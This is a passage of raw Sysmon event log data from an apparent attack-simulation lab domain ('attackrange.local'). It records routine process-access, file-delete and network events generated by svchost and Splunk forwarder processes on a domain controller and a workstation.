12:23:57.181{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440490Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:57.007{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56B8D89A1864C9BEB4F14E2F94B14389,SHA256=34CA4D1CF3E3A24718691C9FC829D533FE91716B50044427667A57708251515F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291592Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:57.221{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30656B184CB4B7462CCEDDAF5F8A1E33,SHA256=90249075CBAAD5C605678EDDF388AF4D82BCEDB2E35A3DFD235EB63C798B35BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291591Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:57.221{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B8C0239FEA3721AC24F3EC58747ECDD,SHA256=CF1B71386A15AD8DEFB4E4035D09F6E3DE0F425081B63CCEB1E04F745BC1B7A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291595Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:58.655{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10BDFC6B8CCF891CD3E6C2DD1D5EEFC9,SHA256=B525756EC841A25D290D2302A8D6B789C3E02069EB52644745C949172FFDA4A3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440495Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:58.182{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440494Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:58.182{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440493Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:58.055{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=907143C3B3B270253E9994214236F44F,SHA256=820BBC1937B73826CF629326C9CFE623AA4929DE444A0D02A19A78169EEF6B67,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291594Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:55.500{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50621-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291596Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:59.657{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C19D1C6777FE1A9CE382B1971C4BADB7,SHA256=3448324945BE0982B29B75114D1CF3CDC75D1F5140C1FBE286689B4CE4D8F359,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440498Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:59.183{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440497Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:59.183{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440496Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:59.058{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AD43897C9CAA81283B9D8F9D6A32BAF,SHA256=26776ADFE6142696E13866B6436F6E2EAB5985613D2FD5F49D5249DB6B763849,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440503Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:57.681{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62407-false10.0.1.12-8000- 23542300x8000000000000000440502Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:00.285{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCD815BCC6FC6A545B5A6192814233E3,SHA256=D00C9A75D3C2C720FC9AA1BEDC653C5975E5A5833672E3B7CF5A918440857A8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291597Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:00.659{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16997FB647B4289A8481DFA9C68836D4,SHA256=44A7BC69E37C0E2FC190F010F1980D14158291A19FBD7FB75EB38BDD1FAF6B8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440501Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:00.230{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B23B4285A1FC1CBEA6A30FBE585A72F1,SHA256=25C50DFACE1F76DD5AA349FC507B0D4BF279924E612D97FF7FAB133E569FAED8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440500Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:00.184{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440499Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:00.184{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291598Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:01.660{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF20A018812C2AC6B30A487244BF328C,SHA256=3024D59778BA8EA1E44DC0E45F3BE326841410B2AB1F177E1F05BA16EF4F61EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440506Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:01.515{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75AC38E5C1069F7D2068FDFED7A584A7,SHA256=9FD10F6BB53ED5099B5541C47ED280900B970B3471FB0824CF0051980DB58DC6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440505Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:01.185{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440504Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:01.185{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440509Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:02.564{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45BE2D8DDB6084E7416F1F5158F790AE,SHA256=F90273C587E247C398CAF228C0BD35DB14FA4877A33F96E42C73C69380D70888,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291599Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:02.663{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6EC7AD2B01DF49B742D970564F42620,SHA256=DD9A40E20ABD6E44E87FB5E281DD411A7296BC1BC9700BC39E05EC3C1CD32D08,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440508Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:02.186{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440507Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:02.186{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291603Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:03.664{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A49FB8B85655C2616F658108A88AAB44,SHA256=313520954B6EEC6D11EBDFD9FEE263FAA9EA83863B1BE5043BF7C2EB0F0A3DB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440512Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:03.797{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA38426A4ABB74109071958026B2A7D9,SHA256=6ECEB1EB9FCC260B0F05FB181DF8122B35E78A3CF4F3B2C3E305558DD47F9C07,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440511Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:03.187{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440510Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:03.187{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000291602Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:01.474{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50622-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291601Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:03.182{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6E3409AA61789C0D1A5F79D3353B2D3D,SHA256=CD51F603BD00EC9D58583930F210629AA1E982DA8B48DDA5937AAF9DE95F1AEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291600Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:03.181{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30656B184CB4B7462CCEDDAF5F8A1E33,SHA256=90249075CBAAD5C605678EDDF388AF4D82BCEDB2E35A3DFD235EB63C798B35BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440515Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:04.818{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FD5924A1B053CCB34819F7ABF7DFE52,SHA256=44EE31CE7B6E405054C5A0CE01374C284F3B1B3B523E2F4C9DC6F7AC532C20C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291604Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:04.666{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67EBA292FDE2F229AF3244701B23E3C0,SHA256=9D2E25A5B2409D38233E5DEFE0D32C8878BFBCCA73D1048D39323B6CDDF30657,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440514Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:04.188{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440513Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:04.188{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291605Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:05.668{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A451CF94BC8939B18BB1FD99A733958,SHA256=DE5F7C86C4D1016C9830027D6AF31650BC7F10C39860C0B48AEF882B6C8F0F64,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440517Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:05.189{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440516Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:05.189{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291606Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:06.691{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B94C322BE6251C399E8A63BDBE6BB36,SHA256=AB4832317205E9F3276A52F63EEE6D1B42BA764441A66293366CED4D2DC02A0C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440523Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:03.563{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62408-false10.0.1.12-8000- 23542300x8000000000000000440522Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 